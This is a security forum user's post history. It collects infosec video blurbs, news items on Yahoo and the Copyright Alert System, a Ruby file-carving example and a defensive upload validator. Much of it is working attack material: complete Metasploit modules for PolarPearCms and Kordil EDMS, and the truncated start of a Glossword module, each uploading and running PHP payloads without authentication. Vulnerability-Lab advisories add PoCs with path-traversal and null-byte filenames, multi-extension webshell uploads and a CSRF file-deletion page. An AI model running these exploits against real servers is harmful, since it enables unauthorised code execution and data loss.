Everything posted by Kwelwild
-
Description: DDoS module of Exploitation Framework

Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying.

Original Source:
Source: Owasp Xenotix Xss Exploit Framework: Ddoser
-
Description: In this video I will show you how to recover data from a hard disk image. In this video I will use the foremost tool for data recovery; this tool was developed by the United States Air Force Office of Special Investigations and The Center for Information Systems Security Studies and Research.

Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying.

Original Source:
Source: Web Application Scanning With Owasp Zap 2.0.0
-
Description: Foremost is a console program to recover files based on their headers, footers, and internal data structures. This process is commonly referred to as data carving. Foremost can work on image files, such as those generated by dd, Safeback, Encase, etc., or directly on a drive. The headers and footers can be specified by a configuration file or you can use command line switches to specify built-in file types. These built-in types look at the data structures of a given file format allowing for a more reliable and faster recovery.

Foremost

Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying.

Original Source:
Source: Foremost Forensic Data Recovery Tool
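As an added illustration of the header/footer carving the description refers to (this is example code written for this page, not foremost's source), the Ruby below carves JPEG and PNG objects out of a byte buffer by signature. The sample buffer, the two-format signature table and the size bound are constructed for the demonstration.

```ruby
# Signature table: JPEG starts FF D8 FF and ends FF D9; PNG starts with its
# 8-byte signature and ends with the IEND chunk ("IEND" followed by a 4-byte CRC).
SIGNATURES = {
  'jpg' => { header: "\xFF\xD8\xFF".b,        footer: "\xFF\xD9".b, footer_len: 2 },
  'png' => { header: "\x89PNG\r\n\x1A\n".b,   footer: "IEND".b,     footer_len: 8 },
}.freeze

# Scan buf for each header and carve up to and including the next matching
# footer. A header with no footer within max_size bytes is skipped, which is
# the same per-type size bound foremost's configuration file expresses.
# Returns hashes with :type, :offset, :size and :data, sorted by offset.
def carve(buf, max_size: 1_000_000)
  buf = buf.b
  found = []
  SIGNATURES.each do |type, sig|
    pos = 0
    while (start = buf.index(sig[:header], pos))
      foot = buf.index(sig[:footer], start + sig[:header].bytesize)
      stop = foot ? foot + sig[:footer_len] : nil
      if stop && stop <= buf.bytesize && stop - start <= max_size
        found << { type: type, offset: start, size: stop - start, data: buf[start...stop] }
        pos = stop
      else
        pos = start + 1 # header without a usable footer: treat as a false positive
      end
    end
  end
  found.sort_by { |f| f[:offset] }
end

# Write each carved object to dir as <offset>.<type>, as a carver would. Returns the paths.
def write_carved(found, dir)
  found.map do |f|
    path = File.join(dir, "#{f[:offset]}.#{f[:type]}")
    File.binwrite(path, f[:data])
    path
  end
end

# Constructed test buffer (not a real disk image): padding, a tiny fake JPEG,
# junk, a tiny fake PNG, then trailing bytes.
def sample_image
  jpeg = "\xFF\xD8\xFF\xE0".b + "JFIF-fake-body".b + "\xFF\xD9".b
  png  = "\x89PNG\r\n\x1A\n".b + "\x00\x00\x00\x00IEND".b + "\xAE\x42\x60\x82".b
  ("\x00".b * 16) + jpeg + "garbage".b + png + ("\xFF".b * 8)
end

if __FILE__ == $0
  carve(sample_image).each { |f| puts "#{f[:type]} at offset #{f[:offset]}, #{f[:size]} bytes" }
end
```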
-
Marissa Mayer, who runs Yahoo's business, has issued an order forbidding employees from working from home, with any emergency to be handled from the company's nearest office. According to a directive issued by Yahoo's human resources office, emergencies can be resolved only from an official company site. With the new "law", Marissa Mayer wants better interaction between employees, which is why "it is vital that all employees be in the offices when they have to work". Mayer, employee number 20 at Google, was named CEO of Yahoo after working 13 years at the company founded by Sergey Brin. The head of one of the oldest brands online is part of the "exclusive club" of women holding important positions in this field, alongside Meg Whitman (Hewlett-Packard), Virginia Rometty (IBM) and Sheryl Sandberg (Facebook). The number of Yahoo employees fell from 14,100 in 2011 to 11,500, and a further reduction caused by the new directive is not ruled out. The company's press office in Great Britain declined to comment on "internal matters".

Source: Noul sef Yahoo interzice lucrul de acasa dupa program din motive de securitate - www.yoda.ro
-
'Copyright Alert System' rolls out to catch illegal downloaders

The "Copyright Alert System," aka "six strikes," kicked off today with the cooperation of five major Internet service providers. The goal of the new campaign is to curb copyright infringement by going after consumers rather than pirates.

While the CAS seems like something that would raise the hackles of privacy and civil liberty groups, the plan isn't to arrest, sue, or fine people downloading illegal movies, games, or music. Instead, the group managing the program -- the Center for Copyright Information -- says its objective is to "educate" such downloaders that they are infringing on protected intellectual copyrights.

"Implementation marks the culmination of many months of work on this groundbreaking and collaborative effort to curb online piracy and promote the lawful use of digital music, movies and TV shows," executive director for the Center for Copyright Information Jill Lesser wrote in a blog post today. "The CAS marks a new way to reach consumers who may be engaging in peer-to-peer (P2P) piracy."

The Center for Copyright Information is a joint venture between Hollywood copyright holders and ISPs -- it is also backed by the White House. AT&T, Cablevision, Verizon, Time Warner Cable, and Comcast are the participating ISP members in the venture.

The CAS has been in the works since 2011 and was scheduled to go into effect last November. But after a series of delays, including reluctance from ISPs and effects of Hurricane Sandy, the Center for Copyright Information postponed its launch until this year.

The ISP is then supposed to gradually ratchet up the pressure on customers who ignore the warnings. Eventually, after six warnings, ISPs can choose to suspend service. Graduated response, however, does not include the termination of service. Customers wrongly accused can appeal to their company and take their case to an arbitration group for review.

The plan doesn't protect Internet consumers from being sued by copyright owners, however. Some ways that pirated material is shared on the Internet, such as cyberlockers, e-mail attachments, and Dropbox folders, are not included under six strikes.

Here's more on the CAS from Lesser's blog post:

We hope this cooperative, multi-stakeholder approach will serve as a model for addressing important issues facing all who participate in the digital entertainment ecosystem. From content creators and owners to distributors to consumers, we all benefit from a better understanding of the choices available and the rights and responsibilities that come with using digital content, thereby helping to drive investment in content creation and innovative services that offer exciting ways to enjoy music, video and all digital content.

Over the course of the next several days our participating ISPs will begin rolling out the system. Practically speaking, this means our content partners will begin sending notices of alleged P2P copyright infringement to ISPs, and the ISPs will begin forwarding those notices in the form of Copyright Alerts to consumers. Most consumers will never receive Alerts under the program. Consumers whose accounts have been used to share copyrighted content over P2P networks illegally (or without authority) will receive Alerts that are meant to educate rather than punish, and direct them to legal alternatives. And for those consumers who believe they received Alerts in error, an easy to use process will be in place for them to seek independent review of the Alerts they received.

Source: 'Copyright Alert System' rolls out to catch illegal downloaders | Security & Privacy - CNET News
-
PolarPearCms PHP File Upload Vulnerability

```ruby
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'
require 'msf/core/exploit/php_exe'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'PolarPearCms PHP File Upload Vulnerability',
      'Description'    => %q{
          This module exploits a file upload vulnerability found in PolarPear CMS.
          By abusing the upload.php file, a malicious user can upload a file to a temp
          directory without authentication, which results in arbitrary code execution.
      },
      'Author'         =>
        [
          'Fady Mohamed Osman' # @Fady_Osman
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2013-0803' ]
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00",
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Jan 21 2012'))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The full URI path to Polarbearcms', '/polarbearcms']),
        OptString.new('UPLOADDIR', [true, 'The directory to upload to starting from web root. This should be writable', '/polarbearcms'])
      ], self.class)
  end

  def check
    uri = target_uri.path
    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => normalize_uri(uri, 'includes', 'jquery.uploadify', 'upload.php')
    })

    if not res or res.code != 200
      return Exploit::CheckCode::Unknown
    end

    return Exploit::CheckCode::Appears
  end

  def exploit
    uri = target_uri.path
    upload_dir = normalize_uri("#{datastore['UPLOADDIR']}/")
    peer = "#{rhost}:#{rport}"

    @payload_name = "#{rand_text_alpha(5)}.php"
    php_payload = get_write_exec_payload(:unlink_self=>true)

    data = Rex::MIME::Message.new
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
    # the "folder" form field; the closing parenthesis was lost in the posted copy
    data.add_part(normalize_uri(uri, 'includes', 'jquery.uploadify/'), nil, nil, "form-data; name=\"folder\"")
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    print_status("#{peer} - Uploading payload #{@payload_name}")
    res = send_request_cgi({
      'method' => 'POST',
      'uri'    => normalize_uri(uri, 'includes', 'jquery.uploadify', "upload.php?folder=#{upload_dir}"),
      'ctype'  => "multipart/form-data; boundary=#{data.bound}",
      'data'   => post_data
    })

    if not res or res.code != 200
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
    end

    upload_uri = "#{upload_dir}#{@payload_name}"

    print_status("#{peer} - Executing payload #{@payload_name}")
    res = send_request_raw({
      'uri'    => upload_uri,
      'method' => 'GET'
    })
  end
end
```

Source: PolarPearCms PHP File Upload Vulnerability
-
IPMap v2.5 iPad iPhone - Arbitrary File Upload

Title:
======
IPMap v2.5 iPad iPhone - Arbitrary File Upload Web Vulnerabilities

Date:
=====
2013-02-18

References:
===========
http://www.vulnerability-lab.com/get_content.php?id=866

VL-ID:
=====
866

Common Vulnerability Scoring System:
====================================
6.3

Introduction:
=============
IPMap - IP Address Lookup Details & HTTP Wireless File Sharing with latest WorldWide IP database & FREE Monthly update.
Accuracy: Over 99.8% on a country level and 83% on a city level for the US within a 25 mile radius.

Features:
Auto Detect & Lookup Your Real IP address
IP address Hostname
IP address Country Code
...
...
...
IP address Area Code
IP location Map
HTTP Wireless File Sharing
iTunes File Sync
Web Upload File Support
Customizable Background from your Photos Album

(Copy of the Homepage: https://itunes.apple.com/us/app/ipmap-ip-address-lookup-details/id416041538 )

Abstract:
=========
The Vulnerability Laboratory Research Team discovered an arbitrary file upload vulnerability in the mobile IPMap v2.5 app for the Apple iPad & iPhone.

Report-Timeline:
================
2013-02-18: Public Disclosure

Status:
========
Published

Affected Products:
==================
Apple AppStore
Product: IPMap - iPad iPhone 2.5

Exploitation-Technique:
=======================
Remote

Severity:
=========
Critical

Details:
========
A local file include and arbitrary file upload web vulnerability via the POST request method is detected in the mobile IPMap v2.5 app for the Apple iPad & iPhone.
The vulnerability allows remote attackers to inject local app webserver folders via the POST method in order to request unauthorized local webserver files.

1.1
The main vulnerability is located in the upload file script of the webserver (http://192.168.0.10:6123/) when processing a manipulated filename loaded via the POST request method.
The execution of the injected path or file request occurs when the attacker views the file index listing of the wifi web application web-server.

1.2
Remote attackers can also implement mobile webshells without authorization by using multiple file extensions (pentest.php.js.gif) when uploading (submitting) via the POST request method.
The attacker uploads a file with a double extension or multiple extensions and accesses the file in the second step via the webserver's directory listing to compromise the Apple iPhone or iPad.

Exploitation of the local file include web vulnerability does not require user interaction and also no privileged user account.
Successful exploitation of the web vulnerabilities results in app/service manipulation and iPad or iPhone compromise via file include or unauthorized file (webshell) upload attacks.

Vulnerable Application(s):
[+] WiFilet v1.2 - ITunes or AppStore (Apple)

Vulnerable Module(s):
[+] File Upload via Submit (Web Server) [Remote]

Vulnerable Parameter(s):
[+] file > filename

Affected Module(s):
[+] File Dir Index - Listing

Proof of Concept:
=================
Both vulnerabilities can be exploited by remote attackers without a privileged application user account and also without required user interaction.
For demonstration or reproduce ...

1.1
PoC: (POST)

```
-----------------------------307341202725627
Content-Disposition: form-data; name="file"; filename="../../../../cmd>home>tmp%00<'.png"
Content-Type: image/png

```

Review: File Dir Listing

```html
<html><head>
<meta http-equiv="content-type" content="text/html; charset=ISO-8859-1"><title>IPMap</title>
<style>body { background-color:#f0f7fd; font-family:Tahoma,Arial,Helvetica,sans-serif; font-size:18x; padding:15px; margin-left:15%; margin-right:15%; } </style></head><body>
<h2 style="background-color:#6897ff; margin:0; color:#fff; padding:5px 10px; border: 1px outset #aaa;border-bottom: 0px;">IPMap</h2>
<h4 style="background-color:#6897ff;margin:0; color:#fff; padding:0px 10px 8px 10px; border: 1px outset #aaa; border-top: 0px;">
The following files are hosted live from the iPhone's Docs folder.</h4>
<p><table style="text-align:center; border-color:#9bc0d2; background:#f0f7fd; color:#4e697a; margin:0 auto;" border="1" cellpadding="0" cellspacing="0"><tbody><tr height="30"><td width="400">
<strong>File Name</strong></td><td width="400"><strong>File Info</strong></td></tr><tr height="30">
<td><a href="http://192.168.0.10:6123/../../../../cmd>home>tmp%00<'">%20%20%20%20&"><iframe src="../../../../cmd>home>tmp%00<'">%20%20%20%20&">
%20%20%20%20</a></td><td>(27.3 Kb, 2013-02-07 07:00:31 +0000)</td></tr></table></p>
<form action="" method="post" enctype="multipart/form-data" name="form1" id="form1"><table border="0" cellpadding="0" cellspacing="0" style="text-align:center; margin:0 auto;"><tr height="50"><td width="400"><label>upload file<input type="file" name="file" id="file" /></label></td><td width="400"><label><input type="submit" name="button" id="button" value="Submit" />
<font size="-1">* Please do NOT upload index.htm or index.html</font></label></td></tr></table></form></body></html>
</iframe></a></td></tr></tbody></table></p></body></html>
```

1.2
PoC: (POST)

```
-----------------------------307341202725627
Content-Disposition: form-data; name="file"; filename="pentest.php.js.html.htm.xml.png"
Content-Type: image/gif
```

Reference(s):
http://192.168.0.10:6123/

Risk:
=====
The security risk of the arbitrary file upload web vulnerability via the POST request method is estimated as critical.

Credits:
========
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@vulnerability-lab.com)

Disclaimer:
===========
The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register
Contact: admin@vulnerability-lab.com - support@vulnerability-lab.com - research@vulnerability-lab.com
Section: video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partial usage, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website are trademarks of the vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material, contact admin@vulnerability-lab.com or support@vulnerability-lab.com to get permission.

Copyright © 2013 | Vulnerability Laboratory

--
VULNERABILITY RESEARCH LABORATORY
LABORATORY RESEARCH TEAM
CONTACT: research@vulnerability-lab.com

Source: IPMap v2.5 iPad iPhone - Arbitrary File Upload
-
WiFilet v1.2 iPad iPhone - Multiple Vulnerabilities

Title:
======
WiFilet v1.2 iPad iPhone - Multiple Web Vulnerabilities

Date:
=====
2013-02-22

References:
===========
http://www.vulnerability-lab.com/get_content.php?id=867

VL-ID:
=====
867

Common Vulnerability Scoring System:
====================================
6.3

Introduction:
=============
WiFilet makes your iPhone/iPad a mobile disk; you can use browsers to upload or download files between iPhone/iPad and PC through WIFI.

* Easily sync music between computers and play it directly.
* Easily browse photo libraries via a web browser.
* Simple & handy UI
* Progress of the uploading files
* Open files (like images, word, excel, ppt etc.) directly in your device
* Share files by Email attachment
* Password protection
* ...

(Copy of the Homepage: https://itunes.apple.com/de/app/wifilet/id492512158 )

Abstract:
=========
The Vulnerability Laboratory Research Team discovered multiple web vulnerabilities in the mobile WiFilet v1.2 app for the Apple iPad & iPhone.

Report-Timeline:
================
2013-02-22: Public Disclosure

Status:
========
Published

Affected Products:
==================
Apple AppStore
Product: WiFilet (WiFi) Application (iPad & iPhone) 1.2

Exploitation-Technique:
=======================
Remote

Severity:
=========
Critical

Details:
========
A local file include and arbitrary file upload web vulnerability via the POST request method is detected in the mobile WiFilet v1.2 app for the Apple iPad & iPhone.
The vulnerability allows remote attackers to inject local app webserver folders via the POST method in order to request unauthorized local webserver files.

1.1
The main vulnerability is located in the upload file script of the webserver (http://192.168.0.10:9999/) when processing a manipulated filename loaded via the POST request method.
The execution of the injected path or file request occurs when the attacker views the file index listing of the wifi web application web-server.

1.1.2
Remote attackers can also implement mobile webshells without authorization by using multiple file extensions (pentest.php.js.gif) when uploading (submitting) via the POST request method.
The attacker uploads a file with a double extension and accesses the file in the second step via the webserver's directory listing to compromise the Apple iPhone or iPad.

Exploitation of the local file include web vulnerability does not require user interaction and also no privileged user account.
Successful exploitation of the web vulnerabilities results in app/service manipulation and iPad or iPhone compromise via file include or unauthorized file (webshell) upload attacks.

Vulnerable Application(s):
[+] WiFilet v1.2 - ITunes or AppStore (Apple)

Vulnerable Module(s):
[+] File Upload via Submit (Web Server) [Remote]

Vulnerable Parameter(s):
[+] file > filename

Affected Module(s):
[+] File Dir Index - Listing

1.2
A cross site request forgery web vulnerability is detected in the mobile WiFilet v1.2 app for the Apple iPad & iPhone.
The vulnerability allows remote attackers to form manipulated links or scripts that execute application functions when client side requests are loaded in the web browser.

The vulnerability is located in the application delete module and the insecurely parsed file parameter. A remote attacker can force application users with a non-expired session to execute an application function by clicking a manipulated link.
Exploitation of the vulnerability requires medium or high user interaction and no privileged application user account.
Successful exploitation of the vulnerability results in account theft via client side session hijacking, client side phishing, or client-side content request manipulation.

Vulnerable Application(s):
[+] WiFilet v1.2 - ITunes or AppStore (Apple)

Vulnerable Module(s):
[+] Delete

Vulnerable Module(s):
[+] file

Affected Module(s):
[+] File Dir - Listing

Proof of Concept:
=================
Both vulnerabilities can be exploited by remote attackers without a privileged application user account and also without required user interaction.
For demonstration or reproduce ...

1.1 Local File/Path Include Web Vulnerability

Review: Index Listing

```html
<tr><td title="../[FILE OR PATH REQUEST]<.png"><img src="/img/ext/png.png" align="absmiddle">
<a href="/down?f=6">../[FILE OR PATH REQUEST].png</a></td><td style="text-align:center;">2013-02-10 18:46</td>
<td>PNG Image</td><td><div title="27920" align="right">27,27 KB</div></td><td style="text-align:center;">
<button class="btn btn-danger" onclick="deleteFile("6")">Delete</button></td></tr>
```

PoC:

```
--- Session Log ---
[{"bytes":233966,"id":7,"name":"8765434.png","createDate":"2013-02-10 18:46","ext":"png","typeDesc":"file_type_png","size":"228,48 KB"},
 {"bytes":27920,"id":6,"name":"../[FILE OR PATH REQUEST].png","createDate":"2013-02-10 18:46","ext":"png","typeDesc":"file_type_png","size":"27,27 KB"},
 {"bytes":27920,"id":5,"name":"327.png","createDate":"2013-02-06 18:02","ext":"png","typeDesc":"file_type_png","size":"27,27 KB"},
 {"bytes":27920,"id":4,"name":"327.png","createDate":"2013-02-06 18:02","ext":"png","typeDesc":"file_type_png","size":"27,27 KB"}]
...
```

or

http://192.168.0.10:9999/photo?u=../[FILE OR PATH REQUEST]<

Reference(s):
http://192.168.0.10:9999/
http://192.168.0.10:9999/list?p=&t=1360518361029

1.1.2 Local File Upload Web Vulnerability

Review: Index Listing

```html
<tbody>
<tr><td title="../[FILENAME+MULTIPLE EXTENSIONS].png.txt.iso.php.asp"><img src="/img/ext/file.png" align="absmiddle">
<a href="/../[FILENAME+MULTIPLE EXTENSIONS].png.txt.iso.php.asp">../[FILENAME+MULTIPLE EXTENSIONS].png.txt.iso.php.asp</a></td>
<td style="text-align:center;">2013-02-10 18:53</td><td>File</td><td><div title="98139" align="right">95,84 KB</div></td>
<td style="text-align:center;"><button class="btn btn-danger" onclick="deleteFile("8")">Delete</button></td></tr>
<tr><td title="8765434.png"><img src="/img/ext/png.png" align="absmiddle"> <a href="/down?f=7">8765434.png</a></td>
<td style="text-align:center;">2013-02-10 18:46</td><td>PNG Image</td><td><div title="233966" align="right">228,48 KB</div></td>
<td style="text-align:center;"><button class="btn btn-danger" onclick="deleteFile("7")">Delete</button></td></tr>
<tr><td title="327.png"><img src="/img/ext/png.png" align="absmiddle"> <a href="/down?f=6">327.png</a></td>
<td style="text-align:center;">2013-02-10 18:46</td><td>PNG Image</td><td><div title="27920" align="right">27,27 KB</div></td>
<td style="text-align:center;"><button class="btn btn-danger" onclick="deleteFile("6")">Delete</button></td></tr>
<tr><td title="327.png"><img src="/img/ext/png.png" align="absmiddle"> <a href="/down?f=5">327.png</a></td>
<td style="text-align:center;">2013-02-06 18:02</td><td>PNG Image</td><td><div title="27920" align="right">27,27 KB</div></td>
<td style="text-align:center;"><button class="btn btn-danger" onclick="deleteFile("5")">Delete</button></td></tr>
<tr><td title="327.png"><img src="/img/ext/png.png" align="absmiddle"> <a href="/down?f=4">327.png</a></td>
<td style="text-align:center;">2013-02-06 18:02</td><td>PNG Image</td><td><div title="27920" align="right">27,27 KB</div></td>
<td style="text-align:center;"><button class="btn btn-danger" onclick="deleteFile("4")">Delete</button></td></tr>
</tbody>
```

Reference(s):
http://192.168.0.10:9999/

1.2
The client side cross site request forgery web vulnerability can be exploited by remote attackers without an application user account and with medium or high required user interaction.
For demonstration or reproduce ...

```html
<html>
<head><body>
<title>POC CSRF - Delete Files Exploit</title>
<Referer=http://192.168.0.10:9999/delete?f=9>
<Referer=http://192.168.0.10:9999/delete?f=9>
<Referer=http://http://192.168.0.10:9999/delete?f=1>
<Referer=http://http://192.168.0.10:9999/delete?f=2>
<Referer=http://http://192.168.0.10:9999/delete?f=3>
<Referer=http://http://192.168.0.10:9999/delete?f=4>
<Referer=http://http://192.168.0.10:9999/delete?f=5>
<Referer=http://http://192.168.0.10:9999/delete?f=6>
<Referer=http://http://192.168.0.10:9999/delete?f=7>
<Referer=http://http://192.168.0.10:9999/delete?f=8>
<Referer=http://http://192.168.0.10:9999/delete?f=9>
<Referer=http://http://192.168.0.10:9999/delete?f=10>
</body></head>
</html>
```

Risk:
=====
1.1
The security risk of the local path/file include web vulnerability via the POST request method is estimated as critical.

1.1.2
The security risk of the arbitrary file upload web vulnerability via the POST request method is estimated as high(+).

1.2
The security risk of the cross site request forgery web vulnerability via the POST request method is estimated as low(+).

Credits:
========
Vulnerability Laboratory [Research Team] - Chokri Ben Achour (meister@vulnerability-lab.com)

Copyright © 2013 | Vulnerability Laboratory

Source: WiFilet v1.2 iPad iPhone - Multiple Vulnerabilities
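The IPMap and WiFilet advisories above turn on the same defects: the upload script stores whatever filename the client sends (path segments, null bytes, stacked extensions included), the listing page echoes that name into HTML unescaped, and WiFilet's delete module acts on a bare GET /delete?f=N. The Ruby below is an added example written for this page, not code from either app or from Vulnerability-Lab; the extension allow-list, the csrf_token parameter name and the helper names are assumptions. It rejects the exact filenames the advisories used and shows the token check a delete handler needs.

```ruby
require 'securerandom'
require 'cgi'

ALLOWED_EXT = %w[png jpg jpeg gif txt pdf].freeze # assumed allow-list for this example

# Validate a client-supplied upload filename. Returns [true, nil] or [false, reason].
# Each rejection corresponds to something the advisories show the apps accepting.
def validate_upload_name(raw)
  name = raw.to_s.b
  return [false, 'empty name']             if name.empty?
  return [false, 'path separator']         if name.match?(%r{[/\\]})          # ../../ traversal
  return [false, 'null byte']              if name.include?("\x00".b) || name.downcase.include?('%00')
  return [false, 'leading dot']            if name.start_with?('.')           # "..", dotfiles
  return [false, 'markup or control char'] if name.match?(/[<>"'&\x00-\x1F\x7F]/n)
  exts = name.split('.').drop(1)
  return [false, 'no extension']           if exts.empty?
  return [false, 'multiple extensions']    if exts.size > 1                   # pentest.php.js.gif
  return [false, "extension #{exts[0]} not allowed"] unless ALLOWED_EXT.include?(exts[0].downcase)
  [true, nil]
end

# Never reuse the client name on disk: keep only the vetted extension and
# generate the basename server-side, so no client input reaches the path.
def stored_name(raw)
  ok, reason = validate_upload_name(raw)
  raise ArgumentError, reason unless ok
  "#{SecureRandom.hex(8)}.#{raw.split('.').last.downcase}"
end

# Both listing pages in the advisories write the stored name into HTML as-is,
# which is how a hostile filename becomes injected markup. Escape on output.
def listing_cell(name)
  "<td>#{CGI.escapeHTML(name)}</td>"
end

# Constant-time comparison so token checks do not leak by timing.
def secure_eq(a, b)
  return false unless a.bytesize == b.bytesize
  a.bytes.zip(b.bytes).inject(0) { |acc, (x, y)| acc | (x ^ y) } == 0
end

# A delete must not happen on GET (a link or image tag can trigger that) and
# must carry a per-session CSRF token that matches the server-side one.
def delete_allowed?(method, params, session_token)
  return false unless method == 'POST'
  token = params['csrf_token'].to_s
  return false if token.empty? || session_token.to_s.empty?
  secure_eq(token, session_token.to_s)
end

if __FILE__ == $0
  # Filenames taken from the two advisories plus a benign one from the listing.
  ["../../../../cmd>home>tmp%00<'.png", "pentest.php.js.gif",
   "pentest.php.js.html.htm.xml.png", "327.png"].each do |n|
    ok, why = validate_upload_name(n)
    puts "#{n.inspect}: #{ok ? 'accepted' : "rejected (#{why})"}"
  end
end
```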
-
Kordil EDMS v2.2.60rc3 Unauthenticated Arbitrary File Upload Vulnerability

```ruby
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info={})
    super(update_info(info,
      'Name'           => "Kordil EDMS v2.2.60rc3 Unauthenticated Arbitrary File Upload Vulnerability",
      'Description'    => %q{
          This module exploits a vulnerability in Kordil EDMS v2.2.60rc3.
          This application has an upload feature that allows an unauthenticated
          user to upload arbitrary files to the '/kordil_edms/userpictures/' directory.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Brendan Coles <bcoles[at]gmail.com>' # Discovery and exploit
        ],
      'References'     =>
        [
          #['OSVDB', ''],
          #['EDB', ''],
        ],
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        => [ ['Automatic Targeting', { 'auto' => true }] ],
      'Privileged'     => false,
      'DisclosureDate' => "Feb 22 2013",
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The path to the web application', '/kordil_edms/']),
      ], self.class)
  end

  def check
    base = target_uri.path
    peer = "#{rhost}:#{rport}"

    # retrieve software version from login page
    begin
      res = send_request_cgi({
        'method' => 'GET',
        'uri'    => normalize_uri(base, 'global_group_login.php')
      })
      if res and res.code == 200
        if res.body =~ /<center><font face="Arial" size="2">Kordil EDMS v2\.2\.60/
          return Exploit::CheckCode::Vulnerable
        elsif res.body =~ /Kordil EDMS v/
          return Exploit::CheckCode::Detected
        end
      end
      return Exploit::CheckCode::Safe
    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
      print_error("#{peer} - Connection failed")
    end
    return Exploit::CheckCode::Unknown
  end

  def upload(base, file)
    data = Rex::MIME::Message.new
    data.add_part(file, 'text/x-php', nil, "form-data; name=\"upload_fd31\"; filename=\"#{@fname}.php\"")
    data.add_part("#{@fname}", nil, nil, 'form-data; name="add_fd0"')
    data.add_part("#{@fname}", nil, nil, 'form-data; name="add_fd27"')
    data.add_part("n", nil, nil, 'form-data; name="act"')
    data_post = data.to_s
    data_post = data_post.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
    res = send_request_cgi({
      'method' => 'POST',
      'uri'    => normalize_uri(base, 'users_add.php'),
      'ctype'  => "multipart/form-data; boundary=#{data.bound}",
      'data'   => data_post
    })
    return res
  end

  def on_new_session(client)
    if client.type == "meterpreter"
      client.core.use("stdapi") if not client.ext.aliases.include?("stdapi")
      client.fs.file.rm("#{@fname}.php")
    else
      client.shell_command_token("rm #{@fname}.php")
    end
  end

  def exploit
    base = target_uri.path
    @peer = "#{rhost}:#{rport}"
    @fname = rand_text_numeric(7)

    # upload PHP payload to userpictures/[fname].php
    print_status("#{@peer} - Uploading PHP payload (#{payload.encoded.length} bytes)")
    php = %Q|<?php #{payload.encoded} ?>|
    begin
      res = upload(base, php)
      if res and res.code == 302 and res.headers['Location'] =~ /\.\/user_account\.php\?/
        print_good("#{@peer} - File uploaded successfully")
      else
        fail_with(Exploit::Failure::UnexpectedReply, "#{@peer} - Uploading PHP payload failed")
      end
    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
      fail_with(Exploit::Failure::Unreachable, "#{@peer} - Connection failed")
    end

    # retrieve and execute PHP payload
    print_status("#{@peer} - Executing payload (userpictures/#{@fname}.php)")
    begin
      res = send_request_cgi({
        'method' => 'GET',
        'uri'    => normalize_uri(base, 'userpictures', "#{@fname}.php")
      })
    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
      fail_with(Exploit::Failure::Unreachable, "#{@peer} - Connection failed")
    end
  end
end
```

Source: Kordil EDMS v2.2.60rc3 Unauthenticated Arbitrary File Upload Vulnerability
-
Glossword v1.8.8 - 1.8.12 Arbitrary File Upload Vulnerability

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info={})
    super(update_info(info,
